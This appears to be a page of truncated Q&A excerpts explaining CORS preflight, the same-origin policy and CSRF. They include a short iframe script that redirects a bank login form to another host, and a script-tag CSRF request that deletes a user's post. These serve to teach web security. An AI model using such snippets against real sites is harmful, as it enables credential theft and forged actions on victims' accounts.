Why is there no preflight in CORS for POST requests with standard content-type

See What is the motivation behind the introduction of preflight CORS requests?. The reason CORS doesn’t require browsers to do a preflight for application/x-www-form-urlencoded, multipart/form-data, or text/plain content types is that if it did, that’d make CORS more restrictive than what browsers have already always allowed (and it’s not the intent of CORS to put …


Simple example for why Same Origin Policy is needed

<iframe id="bank" src="https://yourbank.example"></iframe> <script> window.onload = function() { document.getElementById('bank').contentWindow.document.forms[0].action = 'http://example.com'; }; </script> The JavaScript code changes the form's action property (the destination, in a manner of speaking), so when you submit the form, you send your credentials to me, not your bank. If I set up a PHP script on my server that redirects …


Why Same-origin policy isn’t enough to prevent CSRF attacks?

Summary: I had misunderstood concepts about the Same-origin policy and CORS that @Bergi, @Neil McGuigan and @SilverlightFox helped me to clarify. First of all, what @Bergi says, "SOP does not prevent sending requests. It does prevent a page from accessing results of cross-domain requests.", is an important concept. I thought that a browser doesn't …


ES6 module support in Chrome 62/Chrome Canary 64, does not work locally, CORS error

Unlike regular scripts, ES6 modules are subject to same-origin policy. This means that you cannot import them from the file system or cross-origin without a CORS header (which cannot be set for local files). Basically you need to run this code from a (local) server or disable same-origin in the browser for testing (do not …


same-origin policy and CORS – what’s the point?

The important thing to note here is that if the user is signed in to a site http://example.com/ and the request http://example.com/delete?id=1 deletes a post by the user, then the following code will delete the user's post: <script src="http://example.com/delete?id=1" /> This is called a CSRF/XSRF attack (cross-site request forgery). This is why most server-side web …
